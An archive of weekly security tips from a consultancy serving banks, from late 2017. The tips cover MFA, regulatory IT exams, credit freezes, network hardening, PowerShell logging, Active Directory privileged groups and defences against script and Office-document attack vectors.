Security Tips

11/21/17

Thanksgiving Top 10 List

It's a short week, and everyone at 10-D is focused on the upcoming holiday feast. So this week's tip is admittedly a little short on "security" but will hopefully still help you avoid a crisis if you have a holiday turkey fail.

(With apologies to David Letterman and the Butterball Turkey Hotline.)

Top 10 Emergency Turkey Substitutions

Happy Thanksgiving! And please, share any turkey fails you witness, but please change names to protect the innocent;)

11/16/17

Multi-Factor Authentication: Not horseshoes or grenades; Close does not count.

Time and time again, the question is asked, "Are you using multi-factor authentication (MFA) for that?" When the answer is "Yes", it is often proceeded with "We use a username and password, followed by a series of security questions." However, this is not multi-factor authentication. It does not matter if you enter fourteen different passwords or answers, PIN numbers or another myriad of combinations; if you already know the answer, it's still one factor.

What is MFA?

Multi-factor authentication, also referred to as two-factor authentication (2FA), is a security control that requires the user to present two or more forms of evidence (credentials) when logging into an account. These credentials must fall into two or more of the following categories:

A user's credentials must come from at least two of these categories to be considered multi- or two-factor authenticated. For example, if a user logs into their bank account, which has MFA enabled, the user would be required to enter a username and password. Then, as a second factor, the user would use an authenticator application (soft token), often located on the user's phone that generates a random one-time password (OTP). This OTP is then required to be entered within a pre-set time-frame before access is granted.

MFA helps protect critical banking assets and data by adding in that additional layer of security, which makes it difficult for would-be attackers to steal your data. In the above example, in order for your account to be compromised, the attacker would have to obtain both your username and password, along with your mobile device that contains the authentication application (soft token).

While stopping online crime is unrealistic, this type of control dramatically reduces the risks of data theft, even in the event your username and password is stolen. MFA should be used whenever possible, especially when it comes to your most sensitive data.

11/9/17

InTREx - Are you ready for this new exam program?

More and more banks are reporting getting to experience the FDIC's new Information Technology Risk Examination (InTREx) examination process. The feedback on the street from banks that have gone through an InTREx exam varies from "It wasn't too bad" to "I've had medical procedures that were less invasive!" It also appears that some state banking regulatory agencies are adopting portions of the InTREx examination program and incorporating it into their programs. We believe the OCC may adopt components of the InTREx process in the not-too-distant future.

Our observations of institutions that have recently gone through an InTREx exam indicates a more detailed evaluation than we have seen in the past. One of the biggest differences is the time and depth of questioning put into the examination, with 120 to 160 man-hours of IT examiner time being reported. This may be 3 to 4 times the on-site examination hours than had been experienced in the past.

Findings in these examinations indicate the breadth of the IT examination has also increased. For example, identification of all installed software at the bank, and determining whether it is still supported, has been observed. Also, we are hearing of more in-depth reviews of user permissions for ancillary applications that are used throughout the institution (e.g., who has access to document imaging and to what documents, or who has access to perform loan maintenance access?). In addition, specifics within vendor contracts have been scrutinized, as well as detailed reviews of firewall configurations.

For everyone that thought audits from 10-D Security were tough, now the examiners are rolling up their sleeves and digging in, too. For the foreseeable future we expect they will continue to up their game in evaluating institutions' information security.

ISOs should sit up and pay attention to the new InTREx examination process and what it means to their institution.

BTW: InTREx Survival is just one area of training and preparation that is a part of the ISO Certification Program at 10-D Academy.

For more information, visit: https://www.10dsecurity.com/opencarta/index.php

11/2/17

Another reminder that passwords are not enough

Building on the success of the "Carbanak" cyber-criminal group, a new banking Trojan has been identified that further automates the types of attacks that by some estimates netted the Carbanak gang more than $1 billion in the past few years. Carbanak gained notoriety by targeting financial institutions directly, rather than their customers. By compromising internal bank systems and observing employee procedures, they were able to use a bank's own applications to perform fraudulent transfers.

The new banking Trojan, named "Silence," facilitates these types of attacks by sending virtual screen capture "videos" back to the attackers, so they can observe, in almost real-time, how the bank is operating and how employees use the core applications that the attacker will ultimately use to carry out their theft.

The lesson to be learned from this is that more skilled attackers can make much more money by attacking banks directly, so we should expect this type of attack to continue and mature. It is essential that banks design internal security controls and procedures that assume an attacker already has access to an internal system or systems. This means that as many critical applications as possible internally should be protected with strong multi-factor authentication. This way, if a bad guy steals a user's password to the internal core applications, they would still need a one-time-password (OTP) or some other temporary value to conduct sensitive operations.

10/26/17

Laptop and security in the same sentence, is that possible?

Laptops are a source of anxiety for many Information Security Officers, as they offer some interesting challenges that workstations do not. Since they are portable and can travel with us they are subject to a variety of threats such as being lost or stolen, or physically being damaged by dropping them and or getting them wet. In addition they connect to some of the finest wireless services, like the hotel and airport networks, what could possibly go wrong? Additionally users tend to visit websites on their laptops that they would not do on the company's workstations. Many corporate laptop users admit to letting other family members use laptops for personal use.

If that weren't enough the Examiners seem to get a little cranky when dealing with an institution laptop controls.

Recommendation:

Passwords; Encryption; Anti-Malware; Identification Tags; Locks & Cables; Privacy Screens; VPN and Travel Routers.

To help out, 10-D Secure presents a new blog "Top 5 Laptop Security Tips"" to help keep your laptops safe.

10/19/17

Train your employees how to be mean…(it's not what you think!)

Overall, Americans are a friendly bunch (OK OK…forget about that other driver on the way to the office this morning…) We train our staff to be helpful and pleasant, especially those in positions that interact with customers or the public. Unfortunately, the bad guys know this, and a huge reason many social engineering attacks work is because generally, we want to be nice and helpful. It is one thing to have a lunch and learn about physical security and tell your staff to not let someone follow them through a locked door, and everyone nods their heads in agreement…but it is another thing when they are actually presented with that situation, and have to make the choice between letting someone through, or closing the door in their face. Or perhaps interact with a stranger wandering around the office. Many will take the path that makes them more comfortable…it just doesn't feel right to hold the door open and let close on someone right behind you.

To make this easier, and more likely that users will follow policy, make sure your training includes specific strategies employees can use to enforce company policy without feeling like a jerk. If people have to make up what to say on the spot, they may choose to just let it go, which is exactly what you don't want to happen. Give them specific things to say and do, such as "I'm sorry, but you will need to use your badge so the security logs don't get confused.", or "I'm sure you are allowed in here, but let me take you by the reception desk so we can make sure you can get to where you need to go."

Thinking and doing are two different things, so make sure your training incudes role playing and ask staff to actually say out loud the appropriate responses a few times so it will be more likely to come out correctly when used in real life. Once you give your staff these tools and skills they are more likely to use them when needed.

10/16/17

Sure, My Wireless is Secure.

Security researchers have discovered a protocol bug in WPA2 (Wi-Fi Protected Access) that potentially allows an attacker to decrypt wireless traffic. This new bug has been called KRACK. All wireless systems may be affected by this bug. The Wi-Fi Alliance, a network of companies responsible for Wi-Fi, has responded to the disclosure of the vulnerabilities. "This issue can be resolved through straightforward software updates, and the Wi-Fi industry, including major platform providers, has already started deploying patches to Wi-Fi users." Android, Linux, and Apple patches are forthcoming, and Microsoft has already released a patch to address the issue in the October 10th monthly update.

What can you do?

Push your vendors for updates. Carefully monitor all traffic for malicious activity.

For additional information check out. https://www.krackattacks.com/

10/12/17

Well, that was fun…let's never do that again!

Information security is sometimes a hard and thankless job. Security and functionality are often at odds and your first crack at making something more secure may break it. We often see controls that have been implemented then quickly disabled because it didn't pass the "scream test" (it broke something, and the users scream!). The admin never tried it again, because it was not a fun experience. This is basic human nature (don't touch the hot stove again!), but we need to resist that tendency. Often the control can be put in place, it may just need additional planning and testing. Try it on a smaller group, review logs, or do some basic troubleshooting to see what broke the first time. Virtualization is an excellent way to quickly generate a test environment for trying out new settings or controls. Once you figure out the basic problem, it can be a lot easier to deploy across the network without problems. Don't give up! Your hard work will one day be the one thing that makes the difference between a stopped attacker and a really bad day.

Remember if it was easy, everyone would be doing it. If you have a horror story about a security control gone wrong share it with us. We love good stories.

10/5/17

This is One Time You Don't Want to Stand Out

People go through life wanting to stand out from the crowd. To be noticed. To be recognized from their peers. Asking "When will I get my 15 minutes of fame? I'm special and everyone should know it!" However, when it comes to OFAC compliance, there's something to be said for blending in with the crowd.

The Department of the Treasury, which administers the Office of Foreign Assets Control - more commonly known as OFAC in the banking world - routinely publishes notices about those financial institutions, companies and individuals who decided to "stand out from the crowd" by not complying with OFAC sanctions. Most of these bad actors didn't want the attention, but the OFAC spotlight is now shining directly in their face and the outcome is not all that pretty.

Did you know that in 2017, OFAC has assessed almost $118 million in fines and penalties? And we still have another quarter of the year to go! But wait, if you think that's a lot of moola, it's nothing when you look at the $1.2 billion that was assessed in 2014.

Having a strong OFAC compliance program in place is paramount for every financial institution. This fact is firmly demonstrated by the actual proof that fines are assessed - not just threatened. Even if your financial institution has never had a confirmed OFAC hit, it's a good idea to occasionally validate all the systems you have designed to check OFAC are working as intended and giving you legitimate results. That way you can keep the spotlight off of you during your next examination.

To see more information about OFAC fines, visit https://www.treasury.gov/resource-center/sanctions/CivPen/Pages/civpen-index2.aspx

9/28/17

My Report Card? Really Mom, the Dog Ate It!

Identity Theft can occur from a variety of methods, and the old school method is for someone to simply steal your mail before you even see it. Bank statements, checks, tax info, etc. are all pieces of mail that are a potential gold mine for fraudsters. But how do you know when a piece of mail doesn't make it to you? Believe it or not, there is a free service provided by the good ol' U.S. Postal Service that provides a potential solution: Informed Delivery®. It is a service that provides a digital image of scheduled mail deliveries, either on their website or sent directly to your email inbox. Sign up for free, then receive a daily email containing the scanned image(s) of the front of each letter-sized item you can expect to be delivered. The service is not available at all postal locations, as it requires the mail to have been processed through automated processing equipment.

You can check your local availability of Informed Delivery®, and then sign up for it, at https://informeddelivery.usps.com

You might also be able to finally figure out what really happened to the report card that never showed up in the mail…

9/21/17

If You Don't Use It, You Should Lose It.

When's the last time your IT administrator mentioned BOOTP, RIP, NetBIOS, or mDNS/Bonjour as being critical to the function of your network infrastructure? Chances are, they're probably not needed. On devices such as printers, IP cameras, HVAC sensors, and the myriad of IoT (Internet of Things) being attached to your networks, many obsolete or unnecessary functions, application programing interfaces, or protocols are enabled by default out-the-box and left that way until they cause noticeable issues or become the focus of a high-profile breach.

As we often advise our clients regarding users having local PC administrative rights, it's not about what has happened, but what could happen if an issue is left unchecked. A strong information security program isn't just about locking a door; it also means ensuring your protected assets remain in their expected state and available to those that need them. Allowing unnecessary functions to remain enabled within your network may not only present attack vectors, or in some cases, remote access backdoors, but can also flood your seemingly clean network with broadcast traffic which could result in slowness or data loss.

Administratively, keeping your network pipes clean and safe should be governed with descriptive hardening standards for all newly-introduced and existing hardware or services. In support of your information security program, hardening standards checklists should exist and be updated periodically for servers, workstations, and any other device that is connected to your network. For any significant changes that occur in your infrastructure, ensure that a rollback plan is ready in case problems occur. (This should be part of your change control process for IT admins.)

Knowing your technical environment is half the battle, and discovering the obscure functions that may need to be cleaned-up are a task best performed with network plumbing tools such as internal vulnerability scans and network protocol analyzers (sniffers such as Wireshark.) Such tools can alert administrators to vulnerable or unnecessary protocols and provide insight into what's currently eating up your network bandwidth. If you're unsure about a communication statement from a log or the nature of a vulnerability, research it, study its sources/destinations, and track its behavior over time with repeated scans to determine its legitimacy before disabling.

9/14/17

It's Still Warm Out, But it May be Time for a Freeze

We won't belabor the news you have probably already heard about the recent Equifax breach. There is undoubtedly a lot of fallout yet to occur (read: lawsuits), and unfortunately it will probably include an up-tick in ID theft and credit accounts opened fraudulently. Many people will sign up for credit alerting services, but that's an alarm that only goes off AFTER the theft has occurred and an account has been opened. But there is a proactive alternative.

The three major credit reporting agencies (Experian, Transunion, and, ahem, Equifax) are required to offer "Security Freeze" protection. That is a service where the credit reporting agency will not provide your credit file information to a creditor without it first being "thawed" by the account owner. Since few, if any, creditors will extend credit without first reviewing a credit file, having your information frozen should prevent fraudsters from successfully opening new lines of credit using your stolen information. If you sign up for Security Freeze service and then want a creditor to view your information for legitimate reasons, you first have to "thaw" the information via the credit reporting agency for their access.

The credit reporting agencies may be able to charge a fee for the freezing and thawing services, and you have to set it up individually with each agency. State regulations usually dictate what fees can be charged. If you have been a victim of ID theft (not just the theft of the information, but an attempt at using the stolen info), then most states' rules prevent the credit reporting agencies from charging to place a freeze. For the rest of us, the fee may range from $0 to around $10 for each freeze/thaw request PER agency. As an example, if you wanted to freeze your credit information in the state of Hawaii (maximum of $5 per freeze transaction) then it would be $15 to freeze your information at all three agencies. (Giving in to public pressure, Equifax announced on Sept. 12th they would offer "freeze" service for free through Nov. 21st. Hey Equifax, if you are reading this, you should offer freeze/thaw services for free to everyone affected for at least a year if not permanently. Just saying…)

To find out more about the service and fees for each state go to: http://consumersunion.org/research/consumers-unions-guide-to-security-freeze-protection-2/

To find out if you are one of the lucky folk that Equifax may have leaked data about go to: https://www.equifaxsecurity2017.com/potential-impact/ (BTW, if you checked it earlier and were told your info wasn't compromised you might want to check again. Their list is reported to have changed.)

9/6/17

This Time, Procrastination Won't Pay Off

Conducting an exercise and training on your bank's Incident Response & Reporting program is one of those tasks that is easy to keep on the back burner. Then it becomes time for your exam and you realize you don't have a good response for the examiner when asked "How do you test your Incident Response program?" The solution to save yourself from that stressful moment is by conducting a tabletop exercise that has a scenario built around testing the program, or participate in an externally-facilitated exercise that is designed to evaluate your cybersecurity program.

The Financial Services Information Sharing and Analysis Center (FS-ISAC) conducts an annual "Cyber Attack Against Payments Services" (CAPS) exercise. CAPS is a virtual tabletop exercise that allows you to participate from your own location, without disclosing any confidential information to anyone outside the bank. The CAPS exercise is conducted two times in September each year, and is free for financial services organizations to participate. This year's CAPS exercise will be conducted September 10-11 and then repeated on September 17-18. Yes, those dates are just a few days away so if your organization wishes to participate don't put it off. For more information on this year's CAPS exercise, or to register, go to: http://www2.fsisac.com/l/134411/2017-03-12/26px8j

Free, confidential, and minimal effort to participate. Really, there aren't many good excuses for not participating. That is, unless you are just looking for an effective way of testing your blood pressure come exam time.

8/31/17

PowerShell Gets Enhanced Logging

Microsoft is putting more attention into PowerShell security. Before PowerShell 5.0 for the most part you were limited to event logs showing that PowerShell was executed. With the 5.0 release, Microsoft has added enhanced logging to allow recording of executed PowerShell, scripts, de-obfuscated code, output, and transcripts of activity. This is huge for the blue team defenders out there.

On the flip side, malicious users and red teams have been using PowerShell more and more, as seen in recent ransomware attacks and attack frameworks. PowerShell is included in all recent Windows operating systems, it's easy to use, and until recently leaves very little logging behind. All this may amount to a shift in methods and tactics as PowerShell attacks will be less effective in the future.

Recommendation

Most modern versions of Microsoft windows can take advantage of the new enhanced logging features. Check out this Microsoft blog for detailed usage https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/

8/24/17

Elite Membership Comes With Risk! (Privileged Groups)

While auditing Active Directory for proper group membership, the focus is usually on the Domain Admin group. That is great, but there is much more to be concerned with when auditing group membership. There are several privileged groups in Active Directory that are super dangerous in the wrong hands.

When auditing group membership, ensure user accounts added to the privileged groups, mentioned below, are separate from a user's primary account that is used for day-to-day activities such as internet browsing and email access. Privileged administrative accounts should be used only for their intended purpose; only administrative tasks.

Administrators Group Overview

Administrators is a local group that provides full administrative access to an individual computer or a single domain, depending on its location. Because this account has complete access, you should be very careful about adding users to this group.

Domain Admins is a global group designed to help you administer all the computers in a domain. This group has administrative control over all computers in a domain because it's a member of the Administrators group by default.

Enterprise Admins is a group which has administrative control over all the computers in a domain tree or forest because it's a member of the Administrators group by default.

Schema Admins is a universal group in a native-mode domain; a global group in a mixed-mode domain. The group is authorized to make schema changes in Active Directory.

Groups Used by Operators

Users in these operator groups have privileges to perform very specific administrative tasks across the domain and forest of Active Directory. While somewhat limited in overall ability, these types of permissions can be devastating if bad actors get ahold of an account with this level of control.

Account Operators Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups. They can also log on locally to domain controllers.

Backup Operators is a local group that enables a user to back up and restore files and directories on workstations and servers in a Windows domain. Members of this group can log on to a computer, back up or restore files, and shut down the computer. Because of how the account is set up, they can back up files regardless of whether they have read/write access to the files. On a good note, they can't change access permissions of the files or perform other administrative tasks.

Print Operators is a local group for managing network printers. Members of this group can manage printers running in a Windows domain. Print Operators can also log on to a server locally and shut it down.

Server Operators is a local group that allows a user to perform general administrator tasks. These tasks include sharing server resources, performing file backup and recovery, and much more. Server Operators can perform most common server administration tasks.

Replicator, which is a special group account, is used with the directory replication service. Administrators and operators can set up this service to manage the replication of files and directories in a domain.

Note: the specific access/rights these groups have may vary with the flavor (generation) and mode of Active Directory deployed.

8/17/17

Go Off-Script and Help Stop Malware

For all its faults, the Windows operating system generally just works, even running old software and ancient system tools. One of the ways that Microsoft has maintained compatibility with almost everything is that it maintains backwards compatibility with arcane file types, to its own detriment. We all know about dangerous executables, such as .EXE files, .BAT files, etc. But do you know them all? Attackers love to find old scripting languages like .HTA (HTML Application) and .SVG (Vector Graphic format that can contain embedded code). By default, these files and many others will just execute if opened, but it doesn't have to be that way. Network administrators can restrict the running of these and other file types using various methods. One of the easiest ways is to use Group Policy to associate these file types with notepad.exe, so if a user runs it, it will harmlessly open in Notepad instead. The nice thing about this is that you can use Active Directory groups and only allow scripts to be executed by certain users, like administrators. The file types you should block vary depending on the environment, but consider restricting the following: .HTA, .JS, .VBS, .SVG.

8/10/17

Dangerous Office Docs - Now Without Macros!

One of the most common attack vectors we see is the use of tainted Microsoft Office documents. Usually using Word, Excel, or PowerPoint, these documents almost always contain an exploit that will, if executed, give an attacker some sort of foothold into your environment. Fortunately, documents created by these programs that originate from outside your organization should open in Protected View. This will remove most of the teeth from any exploit that may be lurking in them, as the user has to actively remove Protected View for the exploit to take effect.

Research done by Matt Nelson has found a way around this. Using Publisher and OneNote files, exploits can be embedded that will not be caught (initially) by most antivirus and email filters. The effects of these exploits are limited only by the attacker's imagination. 10-D's team of engineers have used this technique during its Penetration Tests and can testify to its effectiveness. Even services like Gmail will allow the attachments to be sent, where attachments with macros in them are blocked.

What can be done to protect against this? Prevent Publisher (.pub) and OneNote (.one) files from being allowed into your network is a great start if you do not use those programs. If you do, user training on the dangers of opening files sent to them from the Internet is the best defense. For a deeper dive into the technical details of this attack vector, see Matt Nelson's post at enigma0x3.net.



Older Security Tips can be requested at info@10dsecurity.com